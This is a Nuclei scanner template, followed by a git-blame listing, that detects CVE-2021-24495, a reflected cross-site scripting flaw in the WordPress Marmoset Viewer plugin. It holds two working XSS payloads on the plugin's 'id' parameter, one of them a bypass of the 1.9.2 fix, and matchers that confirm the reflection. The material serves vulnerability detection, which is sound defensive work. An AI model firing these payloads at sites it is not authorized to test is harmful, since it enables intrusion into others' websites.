nuclei-templates/cves/2021/CVE-2021-24495.yaml

id: CVE-2021-24495

info:
  name: Wordpress Plugin Marmoset Viewer XSS
  author: johnjhacking
  severity: medium
  tags: cve,cve2021,wp-plugin,wordpress,xss
  reference:
      - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
      - https://wordpress.org/plugins/marmoset-viewer/#developers

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>"
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "</script><svg/onload=alert('{{randstr}}')>"
          - "alert(/{{randstr}}/)"
        part: body
        condition: or

      - type: word
        words:
          - "Marmoset Viewer"
Template Name/ID update as per assigned CVE 2021-07-06 06:37:53 +00:00			`id: CVE-2021-24495`
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00
			`info:`
Template Name/ID update as per assigned CVE 2021-07-06 06:37:53 +00:00			`name: Wordpress Plugin Marmoset Viewer XSS`
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00			`author: johnjhacking`
			`severity: medium`
Template Name/ID update as per assigned CVE 2021-07-06 06:37:53 +00:00			`tags: cve,cve2021,wp-plugin,wordpress,xss`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Added additional reference 2021-07-06 06:42:09 +00:00			`- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/`
			`- https://wordpress.org/plugins/marmoset-viewer/#developers`
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00
			`requests:`
			`- method: GET`
			`path:`
misc changes 2021-06-30 12:54:34 +00:00			`- "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>"`
Added bypass for 1.9.2 Another payload was identified, as a bypass in version 1.9.2. This bypass caused the vendor to upgrade to 1.9.3 I have added the bypass and the matcher above. Let me know what you think. 2021-07-06 00:39:25 +00:00			`- "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"`
Template Name/ID update as per assigned CVE 2021-07-06 06:37:53 +00:00
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
condition update as per new bypass 2021-07-06 06:33:51 +00:00
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00			`- type: word`
			`words:`
misc changes 2021-06-30 12:54:34 +00:00			`- "</script><svg/onload=alert('{{randstr}}')>"`
Added bypass for 1.9.2 Another payload was identified, as a bypass in version 1.9.2. This bypass caused the vendor to upgrade to 1.9.3 I have added the bypass and the matcher above. Let me know what you think. 2021-07-06 00:39:25 +00:00			`- "alert(/{{randstr}}/)"`
Add Marmoset Viewer XSS Vulnerability Reference: https://wordpress.org/plugins/marmoset-viewer/#developers 2021-06-30 07:12:12 +00:00			`part: body`
condition update as per new bypass 2021-07-06 06:33:51 +00:00			`condition: or`

			`- type: word`
			`words:`
			`- "Marmoset Viewer"`